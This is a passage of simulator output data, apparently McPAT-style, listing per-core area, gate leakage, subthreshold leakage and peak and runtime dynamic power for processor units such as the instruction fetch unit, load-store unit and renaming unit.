'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.124585,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.280169,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.42513,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00100309,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00100309,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000884701,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000348504,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000598569,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00348945,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00922419,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0400568,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.54796,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.111457,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.136051,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.89013,
'Instruction Fetch Unit/Runtime Dynamic': 0.300279,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0485163,
'L2/Runtime Dynamic': 0.0108162,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.21273,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.483896,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0315632,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0315633,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.36177,
'Load Store Unit/Runtime Dynamic': 0.671119,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0778294,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.155659,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0276219,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0283347,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.158423,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.018319,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.361981,
'Memory Management Unit/Runtime Dynamic': 0.0466537,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.6683,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0994064,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00727013,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0663866,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.173063,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.62706,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0275802,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.224352,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.148255,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.149297,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.24081,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.121553,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.51166,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.148022,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.37409,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0280086,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00626218,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0556367,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0463126,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0836452,
'Execution Unit/Register Files/Runtime Dynamic': 0.0525748,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.124107,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.289599,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.48356,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00149251,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00149251,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00133224,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000533379,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000665285,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00498255,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0131573,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0445215,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.83195,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.143049,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.151215,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.18791,
'Instruction Fetch Unit/Runtime Dynamic': 0.356926,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.045366,
'L2/Runtime Dynamic': 0.00990159,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.43865,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.591447,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0388722,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0388721,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.62221,
'Load Store Unit/Runtime Dynamic': 0.822023,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0958522,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.191704,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0340183,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0346322,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.17608,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0236502,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.390627,
'Memory Management Unit/Runtime Dynamic': 0.0582824,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.2097,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0736777,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0076325,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0743879,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.155698,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.88639,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.100329,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.281491,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.541433,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.20546,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.3314,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.167279,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.704139,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.151978,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.07447,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.102288,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00861792,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0998953,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0637348,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.202184,
'Execution Unit/Register Files/Runtime Dynamic': 0.0723527,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
